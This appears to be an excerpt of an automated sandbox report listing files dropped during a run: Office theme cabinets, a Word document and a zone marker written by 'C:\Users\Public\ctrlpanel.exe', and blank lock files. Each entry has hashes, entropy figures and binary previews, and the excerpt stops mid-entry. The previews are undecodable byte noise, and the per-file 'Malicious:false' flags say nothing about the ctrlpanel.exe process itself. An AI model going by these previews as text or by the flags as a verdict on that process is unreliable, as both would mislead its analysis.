                            SHA1:166398552F6B7F4509732E148F93E207DD60420B
                            SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                            SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                            Malicious:false
                            Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):953453
                            Entropy (8bit):7.99899040756787
                            Encrypted:true
                            SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                            MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                            SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                            SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                            SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                            Malicious:false
                            Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):1310275
                            Entropy (8bit):7.9985829899274385
                            Encrypted:true
                            SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                            MD5:9C9F49A47222C18025CC25575337A965
                            SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                            SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                            SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                            Malicious:false
                            Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):2591108
                            Entropy (8bit):7.999030891647433
                            Encrypted:true
                            SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                            MD5:BEB12A0464D096CA33BAEA4352CE800F
                            SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                            SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                            SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                            Malicious:false
                            Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):1097591
                            Entropy (8bit):7.99825462915052
                            Encrypted:true
                            SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                            MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                            SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                            SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                            SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                            Malicious:false
                            Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):1766185
                            Entropy (8bit):7.9991290831091115
                            Encrypted:true
                            SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                            MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                            SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                            SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                            SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                            Malicious:false
                            Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):1881952
                            Entropy (8bit):7.999066394602922
                            Encrypted:true
                            SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                            MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                            SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                            SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                            SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                            Malicious:false
                            Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):2527736
                            Entropy (8bit):7.992272975565323
                            Encrypted:true
                            SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                            MD5:F256ACA509B4C6C0144D278C7036B0A8
                            SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                            SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                            SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                            Malicious:false
                            Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):3417042
                            Entropy (8bit):7.997652455069165
                            Encrypted:true
                            SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                            MD5:749C3615E54C8E6875518CFD84E5A1B2
                            SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                            SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                            SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                            Malicious:false
                            Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):3256855
                            Entropy (8bit):7.996842935632312
                            Encrypted:true
                            SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                            MD5:8867BDF5FC754DA9DA6F5BA341334595
                            SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                            SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                            SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                            Malicious:false
                            Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...
                            Process:C:\Users\Public\ctrlpanel.exe
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Users\Public\ctrlpanel.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):2.781483514235794
                            Encrypted:false
                            SSDEEP:3:KVGl/lilKlRAGlMhlcuEyml/lLlllFmAaa9eHn:KVy/4KDilxmlA/H
                            MD5:23FC45712C143BDADA6D43C802E61804
                            SHA1:1A8E187CBED49D2C4F33815D23B698A4156F0187
                            SHA-256:3C3CE670CBDB8B1FA410164CC2899952149799B8C1115ED023F6CAF8CDC82E84
                            SHA-512:B96E60165449910A788470A3815007D914598FCCA870845C1EFB1622EE7D1F25980BD89C204ACBEF52E7CFF450C5881B90C999413E84D94088F1E43DC6DB7781
                            Malicious:false
                            Preview:.user..................................................j.o.n.e.s..............-K.......N..a7j........4B...................................*K.."..}.yj.........=7j
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
